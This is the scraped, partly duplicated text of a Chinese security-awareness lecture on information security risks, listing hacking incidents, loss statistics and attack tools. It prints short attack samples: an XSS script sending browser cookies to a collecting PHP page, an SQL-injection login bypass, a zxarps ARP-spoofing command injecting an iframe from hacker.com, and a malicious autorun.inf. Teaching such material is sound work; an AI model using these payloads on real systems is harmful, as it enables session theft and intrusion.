信息安全风险及分析
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
信息安全风险及分析
全球信息安全损失数额:
年份 1999 2000 2001 2002 2003
损失额 36亿美元 42亿美元 129亿美元 超过200亿美元 超过280亿美元
信息安全风险及分析
中国已成为全球黑客的第三大来源地
有关统计数据显示,目前我国95%的与因特网 相联的网络管理中心都遭到过国境内外黑客的攻击或 侵入,受害涉及的覆盖面越来越大、程度越来越深。 据国际互联网保安公司Symantec年的报告指出,中国 甚至已经成为全球黑客的第三大来源地,竟然有6.9% 的攻击国际互联网活动都是由中国发出的。然而面对 这种局面,我国却缺乏像西方发达国家那样健全的防 范措施。
信息安全风险及分析
2003年黑客事件
百度连续遭遇严重黑客攻击
5月15日至5月18日,中文搜索网站百度遭到中国互联网有史 以来罕见黑客攻击。据百度负责技术的副总裁刘建国介绍,自 5月15日22:00起,百度的检索量突然大增,此番增长并未引起 工程师注意。5月16日,攻击更加强烈,每秒钟攻击次数搞到 达1000次,同一个词被查询次数最多达38863次。据互联网技 术专家介绍,每秒钟攻击100次就已经属于非常严重的攻击, 而每秒钟1000次的攻击就实属罕见
信息安全风险及分析
例子:察看星号密码
信息安全风险及分析
例子:读取缓存密码
信息安全风险及分析
例子:控制他人计算机
Dameware 4.5 Remote Administrator2.1
是一种网络管理软件,但是经常被黑客利用来远程控制和管 理,被入侵者的计算机。
信息安全风险及分析
信息安全风险及分析
file_put_contents(‘./cookie/’.time().‘.txt’, urldecode($_GET[‘var’])); } ?>
信息安全风险及分析
构造SQL登陆语句
用户名: admin 密码: 1’ or ‘1’=‘1
信息安全风险及分析
其他例子
击键记录 Office文档挂栽木马 网页木马 木马捆绑
信息安全风险及分析
2020/11/5
信息安全风险及分析
个人介绍 高显嵩
工作经历:
中国“互联网信息安全与政府监管”专家组成员 中国法证技术研究组成员 北京司法局电子数据鉴定协会理事 北京广播电视大学特聘专家 原微软公司的技术支持工程师
项目背景
劳动部全国民办中介机构信用等级评定系统 劳动部全国知识竞赛评分系统 劳动部七个功能平台合并方案 北京统计局的报表打印系统 北京电大一站式平台合并的规划及实施 为考研在线提供整体安全解决方安及实施 为国家电力部内部网络设计安全解决方安及实施 鞍山移动公司网络规划 长期负责北京市安全局国家安全部内部技术培训 负责华彬大厦的整个网络规划及实施 美国百麦公司北京分公司的整个网络规划及实施
信息安全风险及分析
2003年黑客事件
263游戏论坛遭黑客攻击关闭
信息安全风险及分析
2004年黑客事件
腾讯服务器被攻击 10月17日早上10时许,国内各地网民陆续腾讯QQ无
法登陆。据腾讯QQ内部技术人员透露,一国内团体, 利用腾讯QQ服务器漏洞要挟腾讯支付100万美金作为 “修复”费用,腾讯QQ不予理睬后,该组织于17日正 式发动攻击,腾讯QQ服务器在1个小时内大面积出现 故障,不得不全面终止进行抢修.本次行动组织严谨、 操作迅速,业内有部分安全管理人士称网络进入软件 绑架勒索时代。
信息安全风险及分析
黑客离我们很近
1996年信息安全数据显示,世界上平均每20秒就有 一起黑客事件发生,无论是政府机构、军事部门,还 是各大银行、大公司,只要与互联网接轨,就难逃黑 客的“黑手”。 据美国网络安全公司Sophos发布的报告显示,在2008 年第一季度,平均每5秒钟就会有一个网页成为黑客 们的“盘中餐”。 中国网民每年被网络黑客“黑”掉76亿元。
信息安全风险及分析
主要内容
信息安全的重要性 信息安全问题分析 信息安全管理概述 信息安全风险管理 信息安全人员管理
信息安全风险及分析
信息安全重要性
信息安全风险及分析
当前我国网络信息安全的状况
网络及计算机病毒传播泛滥 垃圾邮件和病毒邮件泛滥 黑客攻击事件频繁 用户的个人隐私及计算机的使用权受到侵犯 网络犯罪事件频繁监管力度不够 涉及版权问题的事件增多 没有统一完善的适合国情的安全标准及法规 没有职责分明的管理部门或管理小组 制约与网络基础设施和技术环境 安全体系不健全 全民安全意识及计算机网络知识薄弱
http://www.cert.org/stats/cert_stats.html
信息安全风险及分析
网络病毒传播泛滥
据2001年调查,我国约73%的计算机用户曾感染病毒, 2003年上半年升至83%。其中,感染3次以上的用户高 达59%,而且病毒的破坏性较大,被病毒破坏全部数 据的占14%,破坏部分数据的占57%。 对病毒的预防和发现速度相对缓慢 垃圾邮件及病毒邮件泛滥
信息安全风险及分析
信息安全风险及分析
信息安全风险及分析
信息安全风险及分析
2003年黑客事件
中韩新人王网上对抗 遭黑客入侵推迟10多分钟
中韩围棋新人王对抗赛在中国的新浪网和韩国cyber网 站落子,孔杰七段执白中盘战胜韩国的宋泰坤四段。赛前, 由于有人以孔杰的名字入侵比赛的服务器,导致比赛推迟 了10多分钟才正常进行。
信息安全风险及分析
例子:得到本地登录密码
Pulist.exe+findpass.exe PasswordReminder.exe
信息安全风险及分析
例子:记录本地登录密码
GINA PassWord Sniffer
信息安全风险及分析
例子得到远程计算机的密码
IpcScan2.0
信息安全风险及分析
例子:更改本地管理员密码
SQL INJECTION 针对网站的攻击
信息安全风险及分析
SQL INJECTION 针对网站的攻击
信息安全风险及分析
SQL INJECTION 针对网站的攻击
信息安全风险及分析
SQL INJECTION 针对网站的攻击
信息安全风险及分析
SQL INJECTION 针对网站的攻击
信息安全风险及分析
信息安全风险及分析
2006年黑客事件
2006年12月31日 中国工商银行被黑
06年的最后一天,很多网友都收到一些号称“工行要倒闭, 所有存款均没收”之类的新闻链接,地址都是正牌的 icbc.com.cn,而不是盗版的1cbc.com.cn。原来工商被黑 客入侵,截止当天晚上11点,发现此漏洞已经修改好。
信息安全风险及分析
07年第一黑客事件
深圳律师网被黑
当进入该网站之后,就发生事故了,发现,已经被黑. 主要有以下字样: 天空未留痕迹,鸟儿却已飞过. 网络亦是虚拟,疯狂亦是叛逆. .......~~~尊敬的網站管理員 您好~~~....... ..............台湾是中国的,日本是吃S的.............. .............如果你是中国人............. .........请保留此页几天 谢谢!......... 少年★浪子 所向披靡 OICQ 11888956
信息安全风险及分析
2005年黑客事件频繁
也许你的计算机正在被当作从事违法犯罪活 动的工具,而当这些悄悄发生的时候,你却一无所知, 因为你的电脑已经成为被别人控制的“僵尸电脑”。
信息安全风险及分析
2005年黑客事件
国内首起僵尸网络事件 今年27岁的徐立系唐山市某企业工人,其
利用某些手段在互联网上传播其编写的特定程序,先 后植入4万余台计算机,形成了中国首例BOTNET“僵 尸网络。 2004年10月至2005年1月,徐立操纵“僵尸网络”对 北京大吕黄钟电子商务有限公司所属音乐网站北京飞 行网(简称酷乐),发动多次攻击,致使该公司蒙受 重大经济损失,并导致北京电信数据中心某机房网络 设备大面积瘫痪。
信息安全风险及分析
例子:查看网络内任何人的上网记录
any@web2.54
可以记录同一局域网内任何计算机上浏览的网页内容,察看 的邮箱内容,登陆的ftp的内容。用Outlook或者Outlook Express接受的全部邮件都回同时被该软件接收。
信息安全风险及分析
信息安全风险及分析
例子:查看MSN密码
信息安全风险及分析
例子:打开对方摄像头和语音
信息安全风险及分析
SQL INJECTION 针对网站的攻击
信息安全风险及分析
SQL INJECTION 针对网站的攻击
信息安全风险及分析
SQL INJECTION 针对网站的攻击
信息安全风险及分析
SQL INJECTION 针对网站的攻击
信息安全风险及分析
信息安全风险及分析
Βιβλιοθήκη Baidu
信息安全管理概述
信息安全风险及分析
先来分析两个例子
例一: 局域网内病毒泛滥成灾。
信息安全风险及分析
CERT有关信息安全的统计
http://www.cert.org/stats/cert_stats.html
信息安全风险及分析
CERT有关信息安全的统计
http://www.cert.org/stats/cert_stats.html
信息安全风险及分析
CERT有关信息安全的统计
信息安全风险及分析
2004年黑客事件
江民网站被攻击 2004年10月17日国内著名的杀毒软件厂商江民公
司的网站被一 名为河马史诗的黑客攻破,页面内容被篡改。
攻击缘由:江民公司的最新杀毒软件产品KV2005 的升级导致用户在上网时无法打开“邮件监控和网 页监控”,用户在江民公司的官方论坛发反映后, 江民没有做出及时的回复,也没能在短时间内解决 用户的问题。
WindowsNT/2000/XP/2003/Linux/Unix系统,本地接 触可以更改任意用户的密码。 一张软盘更改本地管理员密码
Ntpassword
一张光盘更改本地管理员密码
ERD Commander 2003
信息安全风险及分析
例子:ERD COMMANDER
信息安全风险及分析
例子: ERD COMMANDER
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src=‘http://hacker.com/backdoor.htm' width=0 height=0>"
信息安全风险及分析
ARP协议工作原理
信息安全风险及分析
信息安全风险及分析
FBI计算机犯罪调查报告
2002年503家机构中,有60%受到了攻击 2002年其中223家(占503家的44%)损失的总和达到 $4.55848亿 2003年530家机构中有75%(398家)在年内受到了攻 击 2003年251家(占530家的47%)的经济损失总和为 $2.01799734 亿
信息安全风险及分析
例子:得到他人的邮件密码
密码监听器2.8
信息安全风险及分析
通过监听得到密码
信息安全风险及分析
通过监听得到密码
信息安全风险及分析
通过监听得到密码
信息安全风险及分析
例子:内网渗透 ZXARPS.EXE
内网主机访问任意站点被入侵
指定的IP段中的用户访问的所有网站都插入一个框架代码
XSS 跨站脚本
构建了个 Javascript 脚本传递客户端的 cookie 到黑客的服务器 Javascript 脚本可以简单的这样写 var img = new Image(); img.src = ‘get_cookie.php?var=’ + encodeURI(document.cookie); 然后服务器端使用 PHP 简单写了个脚本保存 Cookie 数据 <?php if (isset($_GET[‘var’])) {
ARP欺骗交换机
信息安全风险及分析
ARP欺骗计算机
信息安全风险及分析
例子:内网U盘感染
U盘在互联网和局域网内交叉使用文件被盗取
Autorun.inf autorun风暴 [autorun] open= shell\open=打开(&O) shell\open\Command=WScript.exe .\autorun.vbs shell\open\Default=1 shell\explore=资源管理器(&X) shell\explore\Command=WScript.exe .\autorun.vbs
全球信息安全损失数额:
年份 1999 2000 2001 2002 2003
损失额 36亿美元 42亿美元 129亿美元 超过200亿美元 超过280亿美元
信息安全风险及分析
中国已成为全球黑客的第三大来源地
有关统计数据显示,目前我国95%的与因特网 相联的网络管理中心都遭到过国境内外黑客的攻击或 侵入,受害涉及的覆盖面越来越大、程度越来越深。 据国际互联网保安公司Symantec年的报告指出,中国 甚至已经成为全球黑客的第三大来源地,竟然有6.9% 的攻击国际互联网活动都是由中国发出的。然而面对 这种局面,我国却缺乏像西方发达国家那样健全的防 范措施。
信息安全风险及分析
2003年黑客事件
百度连续遭遇严重黑客攻击
5月15日至5月18日,中文搜索网站百度遭到中国互联网有史 以来罕见黑客攻击。据百度负责技术的副总裁刘建国介绍,自 5月15日22:00起,百度的检索量突然大增,此番增长并未引起 工程师注意。5月16日,攻击更加强烈,每秒钟攻击次数搞到 达1000次,同一个词被查询次数最多达38863次。据互联网技 术专家介绍,每秒钟攻击100次就已经属于非常严重的攻击, 而每秒钟1000次的攻击就实属罕见
信息安全风险及分析
例子:察看星号密码
信息安全风险及分析
例子:读取缓存密码
信息安全风险及分析
例子:控制他人计算机
Dameware 4.5 Remote Administrator2.1
是一种网络管理软件,但是经常被黑客利用来远程控制和管 理,被入侵者的计算机。
信息安全风险及分析
信息安全风险及分析
file_put_contents(‘./cookie/’.time().‘.txt’, urldecode($_GET[‘var’])); } ?>
信息安全风险及分析
构造SQL登陆语句
用户名: admin 密码: 1’ or ‘1’=‘1
信息安全风险及分析
其他例子
击键记录 Office文档挂栽木马 网页木马 木马捆绑
信息安全风险及分析
2020/11/5
信息安全风险及分析
个人介绍 高显嵩
工作经历:
中国“互联网信息安全与政府监管”专家组成员 中国法证技术研究组成员 北京司法局电子数据鉴定协会理事 北京广播电视大学特聘专家 原微软公司的技术支持工程师
项目背景
劳动部全国民办中介机构信用等级评定系统 劳动部全国知识竞赛评分系统 劳动部七个功能平台合并方案 北京统计局的报表打印系统 北京电大一站式平台合并的规划及实施 为考研在线提供整体安全解决方安及实施 为国家电力部内部网络设计安全解决方安及实施 鞍山移动公司网络规划 长期负责北京市安全局国家安全部内部技术培训 负责华彬大厦的整个网络规划及实施 美国百麦公司北京分公司的整个网络规划及实施
信息安全风险及分析
2003年黑客事件
263游戏论坛遭黑客攻击关闭
信息安全风险及分析
2004年黑客事件
腾讯服务器被攻击 10月17日早上10时许,国内各地网民陆续腾讯QQ无
法登陆。据腾讯QQ内部技术人员透露,一国内团体, 利用腾讯QQ服务器漏洞要挟腾讯支付100万美金作为 “修复”费用,腾讯QQ不予理睬后,该组织于17日正 式发动攻击,腾讯QQ服务器在1个小时内大面积出现 故障,不得不全面终止进行抢修.本次行动组织严谨、 操作迅速,业内有部分安全管理人士称网络进入软件 绑架勒索时代。
信息安全风险及分析
黑客离我们很近
1996年信息安全数据显示,世界上平均每20秒就有 一起黑客事件发生,无论是政府机构、军事部门,还 是各大银行、大公司,只要与互联网接轨,就难逃黑 客的“黑手”。 据美国网络安全公司Sophos发布的报告显示,在2008 年第一季度,平均每5秒钟就会有一个网页成为黑客 们的“盘中餐”。 中国网民每年被网络黑客“黑”掉76亿元。
信息安全风险及分析
主要内容
信息安全的重要性 信息安全问题分析 信息安全管理概述 信息安全风险管理 信息安全人员管理
信息安全风险及分析
信息安全重要性
信息安全风险及分析
当前我国网络信息安全的状况
网络及计算机病毒传播泛滥 垃圾邮件和病毒邮件泛滥 黑客攻击事件频繁 用户的个人隐私及计算机的使用权受到侵犯 网络犯罪事件频繁监管力度不够 涉及版权问题的事件增多 没有统一完善的适合国情的安全标准及法规 没有职责分明的管理部门或管理小组 制约与网络基础设施和技术环境 安全体系不健全 全民安全意识及计算机网络知识薄弱
http://www.cert.org/stats/cert_stats.html
信息安全风险及分析
网络病毒传播泛滥
据2001年调查,我国约73%的计算机用户曾感染病毒, 2003年上半年升至83%。其中,感染3次以上的用户高 达59%,而且病毒的破坏性较大,被病毒破坏全部数 据的占14%,破坏部分数据的占57%。 对病毒的预防和发现速度相对缓慢 垃圾邮件及病毒邮件泛滥
信息安全风险及分析
信息安全风险及分析
信息安全风险及分析
信息安全风险及分析
2003年黑客事件
中韩新人王网上对抗 遭黑客入侵推迟10多分钟
中韩围棋新人王对抗赛在中国的新浪网和韩国cyber网 站落子,孔杰七段执白中盘战胜韩国的宋泰坤四段。赛前, 由于有人以孔杰的名字入侵比赛的服务器,导致比赛推迟 了10多分钟才正常进行。
信息安全风险及分析
例子:得到本地登录密码
Pulist.exe+findpass.exe PasswordReminder.exe
信息安全风险及分析
例子:记录本地登录密码
GINA PassWord Sniffer
信息安全风险及分析
例子得到远程计算机的密码
IpcScan2.0
信息安全风险及分析
例子:更改本地管理员密码
SQL INJECTION 针对网站的攻击
信息安全风险及分析
SQL INJECTION 针对网站的攻击
信息安全风险及分析
SQL INJECTION 针对网站的攻击
信息安全风险及分析
SQL INJECTION 针对网站的攻击
信息安全风险及分析
SQL INJECTION 针对网站的攻击
信息安全风险及分析
信息安全风险及分析
2006年黑客事件
2006年12月31日 中国工商银行被黑
06年的最后一天,很多网友都收到一些号称“工行要倒闭, 所有存款均没收”之类的新闻链接,地址都是正牌的 icbc.com.cn,而不是盗版的1cbc.com.cn。原来工商被黑 客入侵,截止当天晚上11点,发现此漏洞已经修改好。
信息安全风险及分析
07年第一黑客事件
深圳律师网被黑
当进入该网站之后,就发生事故了,发现,已经被黑. 主要有以下字样: 天空未留痕迹,鸟儿却已飞过. 网络亦是虚拟,疯狂亦是叛逆. .......~~~尊敬的網站管理員 您好~~~....... ..............台湾是中国的,日本是吃S的.............. .............如果你是中国人............. .........请保留此页几天 谢谢!......... 少年★浪子 所向披靡 OICQ 11888956
信息安全风险及分析
2005年黑客事件频繁
也许你的计算机正在被当作从事违法犯罪活 动的工具,而当这些悄悄发生的时候,你却一无所知, 因为你的电脑已经成为被别人控制的“僵尸电脑”。
信息安全风险及分析
2005年黑客事件
国内首起僵尸网络事件 今年27岁的徐立系唐山市某企业工人,其
利用某些手段在互联网上传播其编写的特定程序,先 后植入4万余台计算机,形成了中国首例BOTNET“僵 尸网络。 2004年10月至2005年1月,徐立操纵“僵尸网络”对 北京大吕黄钟电子商务有限公司所属音乐网站北京飞 行网(简称酷乐),发动多次攻击,致使该公司蒙受 重大经济损失,并导致北京电信数据中心某机房网络 设备大面积瘫痪。
信息安全风险及分析
例子:查看网络内任何人的上网记录
any@web2.54
可以记录同一局域网内任何计算机上浏览的网页内容,察看 的邮箱内容,登陆的ftp的内容。用Outlook或者Outlook Express接受的全部邮件都回同时被该软件接收。
信息安全风险及分析
信息安全风险及分析
例子:查看MSN密码
信息安全风险及分析
例子:打开对方摄像头和语音
信息安全风险及分析
SQL INJECTION 针对网站的攻击
信息安全风险及分析
SQL INJECTION 针对网站的攻击
信息安全风险及分析
SQL INJECTION 针对网站的攻击
信息安全风险及分析
SQL INJECTION 针对网站的攻击
信息安全风险及分析
信息安全风险及分析
Βιβλιοθήκη Baidu
信息安全管理概述
信息安全风险及分析
先来分析两个例子
例一: 局域网内病毒泛滥成灾。
信息安全风险及分析
CERT有关信息安全的统计
http://www.cert.org/stats/cert_stats.html
信息安全风险及分析
CERT有关信息安全的统计
http://www.cert.org/stats/cert_stats.html
信息安全风险及分析
CERT有关信息安全的统计
信息安全风险及分析
2004年黑客事件
江民网站被攻击 2004年10月17日国内著名的杀毒软件厂商江民公
司的网站被一 名为河马史诗的黑客攻破,页面内容被篡改。
攻击缘由:江民公司的最新杀毒软件产品KV2005 的升级导致用户在上网时无法打开“邮件监控和网 页监控”,用户在江民公司的官方论坛发反映后, 江民没有做出及时的回复,也没能在短时间内解决 用户的问题。
WindowsNT/2000/XP/2003/Linux/Unix系统,本地接 触可以更改任意用户的密码。 一张软盘更改本地管理员密码
Ntpassword
一张光盘更改本地管理员密码
ERD Commander 2003
信息安全风险及分析
例子:ERD COMMANDER
信息安全风险及分析
例子: ERD COMMANDER
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src=‘http://hacker.com/backdoor.htm' width=0 height=0>"
信息安全风险及分析
ARP协议工作原理
信息安全风险及分析
信息安全风险及分析
FBI计算机犯罪调查报告
2002年503家机构中,有60%受到了攻击 2002年其中223家(占503家的44%)损失的总和达到 $4.55848亿 2003年530家机构中有75%(398家)在年内受到了攻 击 2003年251家(占530家的47%)的经济损失总和为 $2.01799734 亿
信息安全风险及分析
例子:得到他人的邮件密码
密码监听器2.8
信息安全风险及分析
通过监听得到密码
信息安全风险及分析
通过监听得到密码
信息安全风险及分析
通过监听得到密码
信息安全风险及分析
例子:内网渗透 ZXARPS.EXE
内网主机访问任意站点被入侵
指定的IP段中的用户访问的所有网站都插入一个框架代码
XSS 跨站脚本
构建了个 Javascript 脚本传递客户端的 cookie 到黑客的服务器 Javascript 脚本可以简单的这样写 var img = new Image(); img.src = ‘get_cookie.php?var=’ + encodeURI(document.cookie); 然后服务器端使用 PHP 简单写了个脚本保存 Cookie 数据 <?php if (isset($_GET[‘var’])) {
ARP欺骗交换机
信息安全风险及分析
ARP欺骗计算机
信息安全风险及分析
例子:内网U盘感染
U盘在互联网和局域网内交叉使用文件被盗取
Autorun.inf autorun风暴 [autorun] open= shell\open=打开(&O) shell\open\Command=WScript.exe .\autorun.vbs shell\open\Default=1 shell\explore=资源管理器(&X) shell\explore\Command=WScript.exe .\autorun.vbs